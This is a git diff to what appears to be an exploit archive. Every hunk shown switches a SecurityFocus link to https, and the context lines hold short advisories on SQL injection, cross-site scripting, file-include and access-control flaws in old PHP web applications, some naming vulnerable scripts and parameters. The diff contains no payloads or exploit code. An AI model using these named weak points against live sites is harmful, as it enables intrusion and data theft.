a/exploits/php/webapps/23013.txt +++ b/exploits/php/webapps/23013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8390/info +source: https://www.securityfocus.com/bid/8390/info Multiple SQL injection vulnerabilities have been reported in PHP Website. These issue may be exploited by sending a malicious request to the calendar script. Possible consequencs of exploitation include compromise of the site and disclosure of sensitive information. diff --git a/exploits/php/webapps/23014.txt b/exploits/php/webapps/23014.txt index fffc06242..762763ff1 100644 --- a/exploits/php/webapps/23014.txt +++ b/exploits/php/webapps/23014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23015.txt b/exploits/php/webapps/23015.txt index b73d44931..2989d55b4 100644 --- a/exploits/php/webapps/23015.txt +++ b/exploits/php/webapps/23015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23016.txt b/exploits/php/webapps/23016.txt index 4b04e2b3c..59bdb3e9f 100644 --- a/exploits/php/webapps/23016.txt +++ b/exploits/php/webapps/23016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23017.txt b/exploits/php/webapps/23017.txt index 8e0fddf33..da1bcf4a0 100644 --- a/exploits/php/webapps/23017.txt +++ b/exploits/php/webapps/23017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23018.txt b/exploits/php/webapps/23018.txt index 95587c443..7bf46c717 100644 --- a/exploits/php/webapps/23018.txt +++ b/exploits/php/webapps/23018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8396/info +source: https://www.securityfocus.com/bid/8396/info A vulnerability has been reported in Zorum message board software that allows a remote attacker to send a malformed HTTP request resulting in a disclosure of the installation path. diff --git a/exploits/php/webapps/23020.txt b/exploits/php/webapps/23020.txt index e43bbd7bc..931749ce6 100644 --- a/exploits/php/webapps/23020.txt +++ b/exploits/php/webapps/23020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8401/info +source: https://www.securityfocus.com/bid/8401/info HostAdmin is prone to a path disclosure vulnerability. Passing invalid data to the HostAdmin site will cause an error message to be displayed, which contains installation path information. diff --git a/exploits/php/webapps/23026.txt b/exploits/php/webapps/23026.txt index 57ef4b4c6..16a8866b0 100644 --- a/exploits/php/webapps/23026.txt +++ b/exploits/php/webapps/23026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8414/info +source: https://www.securityfocus.com/bid/8414/info Xoops BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of Xoops where BBCode is rendered. This issue is due to a lack of sufficient sanitization performed on user supplied BBCode tags. Injected code may be rendered in the web browser of a user who views vulnerable areas of the site. This would occur in the security context of the site hosting Xoops and its related modules. diff --git a/exploits/php/webapps/23027.txt b/exploits/php/webapps/23027.txt index 2cc246431..4c43e4399 100644 --- a/exploits/php/webapps/23027.txt +++ b/exploits/php/webapps/23027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8416/info +source: https://www.securityfocus.com/bid/8416/info A file include vulnerability has been reported in the htmltags.php module of HolaCMS. This problem may allow an attacker to access potentially sensitive information reserved for adminstration. It has also been reported that some files included via exploitation may allow for information to be edited. diff --git a/exploits/php/webapps/23036.txt b/exploits/php/webapps/23036.txt index 36d0d19c1..77e54288a 100644 --- a/exploits/php/webapps/23036.txt +++ b/exploits/php/webapps/23036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8430/info +source: https://www.securityfocus.com/bid/8430/info MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users to gain administrative rights. It is possible to exploit this issue by manipulating URI parameters. diff --git a/exploits/php/webapps/23039.txt b/exploits/php/webapps/23039.txt index d7b04999b..4f06fd799 100644 --- a/exploits/php/webapps/23039.txt +++ b/exploits/php/webapps/23039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8441/info +source: https://www.securityfocus.com/bid/8441/info Fusion News is prone to an access validation error allowing a user to add arbitrary user/administrator accounts through manipulating URI parameters. diff --git a/exploits/php/webapps/23057.txt b/exploits/php/webapps/23057.txt index 22ce1bb56..b4caff10a 100644 --- a/exploits/php/webapps/23057.txt +++ b/exploits/php/webapps/23057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8488/info +source: https://www.securityfocus.com/bid/8488/info A file include vulnerability has been reported in the nphpd.php module of newsPHP that may permit an attacker to include and execute malicious script code on a vulnerable host. diff --git a/exploits/php/webapps/23058.txt b/exploits/php/webapps/23058.txt index 391f9ff5c..0889032bf 100644 --- a/exploits/php/webapps/23058.txt +++ b/exploits/php/webapps/23058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8489/info +source: https://www.securityfocus.com/bid/8489/info A vulnerability is reported to exist in newPHP that may allow an attacker to gain access to a vulnerable host due to improper verification of authentication credentials. diff --git a/exploits/php/webapps/23060.txt b/exploits/php/webapps/23060.txt index be8556d87..5bc1d460d 100644 --- a/exploits/php/webapps/23060.txt +++ b/exploits/php/webapps/23060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8499/info +source: https://www.securityfocus.com/bid/8499/info A vulnerability has been reported for Py-Membres that allows remote attackers to obtain administrative privileges on vulnerable installations. diff --git a/exploits/php/webapps/23061.txt b/exploits/php/webapps/23061.txt index 671351c16..4900ead67 100644 --- a/exploits/php/webapps/23061.txt +++ b/exploits/php/webapps/23061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8500/info +source: https://www.securityfocus.com/bid/8500/info A vulnerability has been reported for Py-Membres that allows remote attackers to modify the logic of SQL queries. diff --git a/exploits/php/webapps/23064.txt b/exploits/php/webapps/23064.txt index 592c4ab46..ed8aa8966 100644 --- a/exploits/php/webapps/23064.txt +++ b/exploits/php/webapps/23064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8502/info +source: https://www.securityfocus.com/bid/8502/info An SQL injection vulnerability has been reported in Attila PHP that could allow an attacker to gain unauthorized privileged access to a target site. This could be accomplished by requesting a URI including parameters designed to influence the results of specific user verification checks. Privileged access to a site implementing Attila PHP could allow an attacker to gain sensitive information or launch other attacks. diff --git a/exploits/php/webapps/23065.txt b/exploits/php/webapps/23065.txt index 6236878ec..ee00f5ba8 100644 --- a/exploits/php/webapps/23065.txt +++ b/exploits/php/webapps/23065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8504/info +source: https://www.securityfocus.com/bid/8504/info cross-site scripting vulnerability has been reported for miniPortail. The vulnerability exists due to insufficient sanitization of some user-supplied values. Specifically, malicious HTML code is not sanitized from a URI parameter passed to miniPortail. diff --git a/exploits/php/webapps/23067.txt b/exploits/php/webapps/23067.txt index 6c62b5c45..649b90a08 100644 --- a/exploits/php/webapps/23067.txt +++ b/exploits/php/webapps/23067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8506/info +source: https://www.securityfocus.com/bid/8506/info It has been reported that eNdonesia is prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a victim's browser. The issue reportedly exists in the mod.php script via the 'mod' URI parameter. diff --git a/exploits/php/webapps/23072.txt b/exploits/php/webapps/23072.txt index 98a8e2dff..9c716ecd0 100644 --- a/exploits/php/webapps/23072.txt +++ b/exploits/php/webapps/23072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8519/info +source: https://www.securityfocus.com/bid/8519/info The 'invitefriends.php3' script of Ezboard has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on user-supplied URI parameters. This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23084.txt b/exploits/php/webapps/23084.txt index 0823281a9..f625ee49d 100644 --- a/exploits/php/webapps/23084.txt +++ b/exploits/php/webapps/23084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8520/info +source: https://www.securityfocus.com/bid/8520/info It has been reported that TSguestbook may be prone to HTML injection attacks. The problem is said to occur due to insufficient sanitization of user-supplied input within the 'message' field. As a result, an attacker may post a guestbook entry including malicious HTML or script code within the said field. This could result in the execution of arbitrary code within the browser of an unsuspecting guestbook user. diff --git a/exploits/php/webapps/23099.txt b/exploits/php/webapps/23099.txt index 26ff9e340..17786bebc 100644 --- a/exploits/php/webapps/23099.txt +++ b/exploits/php/webapps/23099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8540/info +source: https://www.securityfocus.com/bid/8540/info It has been reported that WebCalendar may be prone to multiple SQL injection issues in the view_t.php, view_w.php, view_v.php, and login.php modules of the software. The problems arise from a lack of sufficient sanitization of user-supplied input before being included in database queries. diff --git a/exploits/php/webapps/23103.txt b/exploits/php/webapps/23103.txt index 43c9824f9..dd028d0fe 100644 --- a/exploits/php/webapps/23103.txt +++ b/exploits/php/webapps/23103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8551/info +source: https://www.securityfocus.com/bid/8551/info A problem has been reported in the checking of input by Digital Scribe, potentially allow for cross-site scripting attacks. Because of this, it may be possible for an attacker to steal cookie authentication credentials or launch other attacks. diff --git a/exploits/php/webapps/23125.txt b/exploits/php/webapps/23125.txt index afc740905..5d26647bf 100644 --- a/exploits/php/webapps/23125.txt +++ b/exploits/php/webapps/23125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8570/info +source: https://www.securityfocus.com/bid/8570/info phpBB BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of phpBB where BBCode is rendered, for example, bulletin board posts or private messages. This issue is due to a lack of sufficient sanitization performed on user supplied URL BBCode tags. diff --git a/exploits/php/webapps/23129.txt b/exploits/php/webapps/23129.txt index 424ae8f8f..ccae08ab2 100644 --- a/exploits/php/webapps/23129.txt +++ b/exploits/php/webapps/23129.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8575/info +source: https://www.securityfocus.com/bid/8575/info Invision Power Board is prone to a cross-site scripting vulnerability. It has been reported that a remote attacker may construct a malicious link to the index.php script and supply arbitrary HTML code as a value for the 'showtopic' URI parameter. If this link is followed, the content of the URI parameter will be rendered in the browser of the user who followed the link. diff --git a/exploits/php/webapps/23140.txt b/exploits/php/webapps/23140.txt index 610e3b1d3..4f8171961 100644 --- a/exploits/php/webapps/23140.txt +++ b/exploits/php/webapps/23140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8613/info +source: https://www.securityfocus.com/bid/8613/info It has been reported that vbPortal is prone to SQL injection attacks when authentication users. The problem occurs due to insufficient sanitization of the $aid variable, used to store the name of the authenticating user. As a result, an attacker may supply data within the username designed to prematurely terminate the string, and influence the logic of the current SQL query. This may be exploited to expose sensitive information, or potentially to launch attacks against the underlying database. diff --git a/exploits/php/webapps/23158.txt b/exploits/php/webapps/23158.txt index e394785c3..fe4ea87d3 100644 --- a/exploits/php/webapps/23158.txt +++ b/exploits/php/webapps/23158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23159.txt b/exploits/php/webapps/23159.txt index 2b642999b..9ca51f72b 100644 --- a/exploits/php/webapps/23159.txt +++ b/exploits/php/webapps/23159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23160.txt b/exploits/php/webapps/23160.txt index 8c2bc5784..409d805a7 100644 --- a/exploits/php/webapps/23160.txt +++ b/exploits/php/webapps/23160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23163.txt b/exploits/php/webapps/23163.txt index 059a42902..f410d7f2b 100644 --- a/exploits/php/webapps/23163.txt +++ b/exploits/php/webapps/23163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8659/info +source: https://www.securityfocus.com/bid/8659/info It has been reported that Powerslave Portalmanager is prone to an information disclosure issue that may allow remote attackers to gain access to sensitive information about the underlying database structure. The problem is reported to exist in the sql_id parameter. An attacker may insert malformed SQL queries in sql_id, resulting in the software generating an error message and disclosing sensitive database information. Although unconfirmed attackers may also be able to execute arbitrary SQL commands under certain circumstances. diff --git a/exploits/php/webapps/23164.txt b/exploits/php/webapps/23164.txt index 3e4d25c65..486cefa8f 100644 --- a/exploits/php/webapps/23164.txt +++ b/exploits/php/webapps/23164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8663/info +source: https://www.securityfocus.com/bid/8663/info It has been reported that myPHPNuke is prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The issue may exist in the auth.in.php module of the software. diff --git a/exploits/php/webapps/23175.txt b/exploits/php/webapps/23175.txt index e07ddc51a..23bceced9 100644 --- a/exploits/php/webapps/23175.txt +++ b/exploits/php/webapps/23175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8692/info +source: https://www.securityfocus.com/bid/8692/info It has been reported that yMonda Thread-IT is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'Topic Title', 'Name', and 'Message' fields. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23192.txt b/exploits/php/webapps/23192.txt index 51bb27fb0..95c69c210 100644 --- a/exploits/php/webapps/23192.txt +++ b/exploits/php/webapps/23192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8717/info +source: https://www.securityfocus.com/bid/8717/info It has been reported that one of the scripts included with GuppY is vulnerable to an HTML injection attack. The script, "postguest.php", does not perform input validation to prevent the inclusion of HTML/script content in messages posted to the portal by remote clients. The flaw is present in the implementation of the "[c]" tag, which can be used by users posting messages in the forum or in the guestbook components of GuppY portals. diff --git a/exploits/php/webapps/23193.txt b/exploits/php/webapps/23193.txt index 1cba4c04e..db69a006e 100644 --- a/exploits/php/webapps/23193.txt +++ b/exploits/php/webapps/23193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8718/info +source: https://www.securityfocus.com/bid/8718/info Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information. diff --git a/exploits/php/webapps/23194.txt b/exploits/php/webapps/23194.txt index ff8d1b075..d65d5d05a 100644 --- a/exploits/php/webapps/23194.txt +++ b/exploits/php/webapps/23194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8718/info +source: https://www.securityfocus.com/bid/8718/info Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information. diff --git a/exploits/php/webapps/23205.txt b/exploits/php/webapps/23205.txt index f49883ede..30d3d7c5e 100644 --- a/exploits/php/webapps/23205.txt +++ b/exploits/php/webapps/23205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8739/info +source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI parameters. Attacks have been demonstrated that inject partial SQL queries, as values for URI parameters, in a manner that influences DCP-Portal SQL query logic to the attackers benefit. diff --git a/exploits/php/webapps/23206.txt b/exploits/php/webapps/23206.txt index 87d0cbeaa..31084368c 100644 --- a/exploits/php/webapps/23206.txt +++ b/exploits/php/webapps/23206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8739/info +source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI parameters. Attacks have been demonstrated that inject partial SQL queries, as values for URI parameters, in a manner that influences DCP-Portal SQL query logic to the attackers benefit. diff --git a/exploits/php/webapps/23207.txt b/exploits/php/webapps/23207.txt index 74f915328..4fc90499e 100644 --- a/exploits/php/webapps/23207.txt +++ b/exploits/php/webapps/23207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8740/info +source: https://www.securityfocus.com/bid/8740/info It has been reported that Atrise Everyfind is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the search module of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/php/webapps/23208.txt b/exploits/php/webapps/23208.txt index 608509ff4..da86ee997 100644 --- a/exploits/php/webapps/23208.txt +++ b/exploits/php/webapps/23208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8744/info +source: https://www.securityfocus.com/bid/8744/info It has been reported that MPNews PRO is prone to an information disclosure vulnerability. The problem is believed to occur due to MPNews PRO failing to sufficiently filter specific dot-dot-slash sequences (../). As a result, an attacker may be capable of viewing the contents of files located outside of the established web root. diff --git a/exploits/php/webapps/23213.txt b/exploits/php/webapps/23213.txt index db4a49e24..f808fdaa5 100644 --- a/exploits/php/webapps/23213.txt +++ b/exploits/php/webapps/23213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8756/info +source: https://www.securityfocus.com/bid/8756/info Wordpress has been reported prone to multiple SQL injection vulnerabilities. The issues have been reported to exist in the blog.header.php script. A lack of sufficient sanitization performed on 'cat' and 'order_by' URI parameters, may allow an attacker to inject malicious SQL code and thereby influence legitimate Wordpress SQL queries. diff --git a/exploits/php/webapps/23218.txt b/exploits/php/webapps/23218.txt index 59d8a39cb..0444bbb66 100644 --- a/exploits/php/webapps/23218.txt +++ b/exploits/php/webapps/23218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8767/info +source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. diff --git a/exploits/php/webapps/23219.txt b/exploits/php/webapps/23219.txt index a9d180682..4dfdeb2ef 100644 --- a/exploits/php/webapps/23219.txt +++ b/exploits/php/webapps/23219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8768/info +source: https://www.securityfocus.com/bid/8768/info GuppY is reported to be prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the postguest module of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/php/webapps/23220.txt b/exploits/php/webapps/23220.txt index 66623a35b..e6a73a409 100644 --- a/exploits/php/webapps/23220.txt +++ b/exploits/php/webapps/23220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8769/info +source: https://www.securityfocus.com/bid/8769/info GuppY is prone to an issue that could allow a remote attacker to read or write to files on the vulnerable server. diff --git a/exploits/php/webapps/23232.txt b/exploits/php/webapps/23232.txt index af499dec4..2718346bd 100644 --- a/exploits/php/webapps/23232.txt +++ b/exploits/php/webapps/23232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8791/info +source: https://www.securityfocus.com/bid/8791/info PayPal Store Front is prone to a remote file include vulnerability. It may be possible for a remote attacker to influence the include path for an external page to point to an attacker-specified location. This could be exploited to include a remote PHP script, which will be executed in the context of the web server hosting the vulnerable PayPal Store Front software. diff --git a/exploits/php/webapps/23233.txt b/exploits/php/webapps/23233.txt index 1a1b3346c..f1beddb88 100644 --- a/exploits/php/webapps/23233.txt +++ b/exploits/php/webapps/23233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8792/info +source: https://www.securityfocus.com/bid/8792/info Geeklog has been reported prone to multiple HTML Injection vulnerabilities. diff --git a/exploits/php/webapps/23237.pl b/exploits/php/webapps/23237.pl index 404d00f6c..393e81925 100755 --- a/exploits/php/webapps/23237.pl +++ b/exploits/php/webapps/23237.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8798/info +source: https://www.securityfocus.com/bid/8798/info It has been reported that PHP-Nuke is prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The issue is said to occur within the admin.php file, specifically when authenticating to a server. diff --git a/exploits/php/webapps/23238.txt b/exploits/php/webapps/23238.txt index ad7353a64..567bdd60a 100644 --- a/exploits/php/webapps/23238.txt +++ b/exploits/php/webapps/23238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8814/info +source: https://www.securityfocus.com/bid/8814/info It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includes the util.php script, when handling specific requests to index.php. As a result, an attacker may be capable of having arbitrary PHP script code being executed on the remote host with the privileges of the web server. diff --git a/exploits/php/webapps/23244.txt b/exploits/php/webapps/23244.txt index 30ff429f4..443eb2732 100644 --- a/exploits/php/webapps/23244.txt +++ b/exploits/php/webapps/23244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8823/info +source: https://www.securityfocus.com/bid/8823/info WrenSoft Zoom Search Engine is prone to a cross-site scripting issue in the software's search module. A remote attacker may be able to execute HTML or script code in a user's browser. diff --git a/exploits/php/webapps/23259.txt b/exploits/php/webapps/23259.txt index ca1128726..0134ee3a7 100644 --- a/exploits/php/webapps/23259.txt +++ b/exploits/php/webapps/23259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8847/info +source: https://www.securityfocus.com/bid/8847/info GoldLink is prone to SQL injection attacks. This is due to insufficient validation of values supplied via cookies. As a result, it may be possible to manipulate SQL queries, potentially resulting in information disclosure, bulletin board compromise or other consequences. diff --git a/exploits/php/webapps/23260.sh b/exploits/php/webapps/23260.sh index 1776e446e..48447affa 100755 --- a/exploits/php/webapps/23260.sh +++ b/exploits/php/webapps/23260.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8849/info +source: https://www.securityfocus.com/bid/8849/info An SQL injection vulnerability has been reported in the Geeklog "forgot password" feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. diff --git a/exploits/php/webapps/23261.txt b/exploits/php/webapps/23261.txt index aa2bf3f40..965b2bba2 100644 --- a/exploits/php/webapps/23261.txt +++ b/exploits/php/webapps/23261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8850/info +source: https://www.securityfocus.com/bid/8850/info Bytehoard is prone to directory traversal attacks. This could potentially permit remote attackers to gain unauthorized access to sensitive files hosted on the system running the software. diff --git a/exploits/php/webapps/23264.txt b/exploits/php/webapps/23264.txt index 22c2cc1af..4860aad72 100644 --- a/exploits/php/webapps/23264.txt +++ b/exploits/php/webapps/23264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8856/info +source: https://www.securityfocus.com/bid/8856/info It has been reported that DeskPro is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input. The problem is reported to be present in various parameters such as cat, article, and ticketid of the faq.php and view.php modules. This issue may allow a remote attacker to influence SQL query logic in order to compromise the DeskPro application or view/modify sensitive information. The consequences of exploitation may vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/23269.txt b/exploits/php/webapps/23269.txt index 15d5b5f8d..2eda4804d 100644 --- a/exploits/php/webapps/23269.txt +++ b/exploits/php/webapps/23269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8863/info +source: https://www.securityfocus.com/bid/8863/info It has been reported that FuzzyMonkey MyClassifieds may be prone to a SQL injection vulnerability that may allow an attacker to disclose user passwords by supplying malicious SQL code to the Email variable. This attack may cause the software to write user password to a world readable file, which may be accessed to launch further attacker against a system. diff --git a/exploits/php/webapps/23294.txt b/exploits/php/webapps/23294.txt index e6b43d526..bce50677d 100644 --- a/exploits/php/webapps/23294.txt +++ b/exploits/php/webapps/23294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8896/info +source: https://www.securityfocus.com/bid/8896/info It has been reported that Chi Kien Uong Guestbook may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The problem is reported to present itself due to insufficient sanitization of user-supplied data when posting an e-mail address or URL to the site. It has been reported that double quotes are not filtered therefore an attacker may be able to append malicious script code in order to be executed on a victim's web browser. diff --git a/exploits/php/webapps/23302.txt b/exploits/php/webapps/23302.txt index cc9097855..a59dfaceb 100644 --- a/exploits/php/webapps/23302.txt +++ b/exploits/php/webapps/23302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8902/info +source: https://www.securityfocus.com/bid/8902/info A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. diff --git a/exploits/php/webapps/23313.txt b/exploits/php/webapps/23313.txt index bf8217531..1bf653c6c 100644 --- a/exploits/php/webapps/23313.txt +++ b/exploits/php/webapps/23313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8934/info +source: https://www.securityfocus.com/bid/8934/info It has been reported that LedForums is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'top_message' and 'topic' fields. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23319.txt b/exploits/php/webapps/23319.txt index e91302456..6140ff614 100644 --- a/exploits/php/webapps/23319.txt +++ b/exploits/php/webapps/23319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8944/info +source: https://www.securityfocus.com/bid/8944/info It has been reported that Tritanium Bulletin Board may be prone to an access validation error that may allow a remote attacker to to gain unauthorized access to threads. A remote attacker may be able to access sensitive data by modifying the URL and supplying a value for thread_id, forum_id, and sid paremeters. diff --git a/exploits/php/webapps/23330.txt b/exploits/php/webapps/23330.txt index ba5e8bc2c..e3838850b 100644 --- a/exploits/php/webapps/23330.txt +++ b/exploits/php/webapps/23330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8956/info +source: https://www.securityfocus.com/bid/8956/info It has been reported that Sympoll is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'vo' parameter. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23333.txt b/exploits/php/webapps/23333.txt index 2f6c83a8c..e46de4325 100644 --- a/exploits/php/webapps/23333.txt +++ b/exploits/php/webapps/23333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8960/info +source: https://www.securityfocus.com/bid/8960/info PHPKIT is reported to be prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of HTML from URI parameters, which will be displayed in web pages that are dynamically generated by the software. The issue exists in the 'include.php' script. diff --git a/exploits/php/webapps/23336.txt b/exploits/php/webapps/23336.txt index 7909eb375..040f27255 100644 --- a/exploits/php/webapps/23336.txt +++ b/exploits/php/webapps/23336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8972/info +source: https://www.securityfocus.com/bid/8972/info It has been reported that OpenAutoClassifieds is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'listings' parameter. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23338.txt b/exploits/php/webapps/23338.txt index d1c71d794..313a6985f 100644 --- a/exploits/php/webapps/23338.txt +++ b/exploits/php/webapps/23338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8977/info +source: https://www.securityfocus.com/bid/8977/info It has been reported that Easy PHP Photo Album is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'dir' parameter. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23363.txt b/exploits/php/webapps/23363.txt index f6fbbc68a..b888b28c7 100644 --- a/exploits/php/webapps/23363.txt +++ b/exploits/php/webapps/23363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8994/info +source: https://www.securityfocus.com/bid/8994/info A SQL injection vulnerability has been reported for phpBB systems. diff --git a/exploits/php/webapps/23372.txt b/exploits/php/webapps/23372.txt index 4a3e65ade..b3c991a2c 100644 --- a/exploits/php/webapps/23372.txt +++ b/exploits/php/webapps/23372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9018/info +source: https://www.securityfocus.com/bid/9018/info PHP-Coolfile allows unauthorized administrative access due to an error in the way access is evaluated in the action.php file. This could allow a remote user to obtain the administrative username and password for the site. diff --git a/exploits/php/webapps/23381.txt b/exploits/php/webapps/23381.txt index 18a9f11ed..594bdb845 100644 --- a/exploits/php/webapps/23381.txt +++ b/exploits/php/webapps/23381.txt @@ 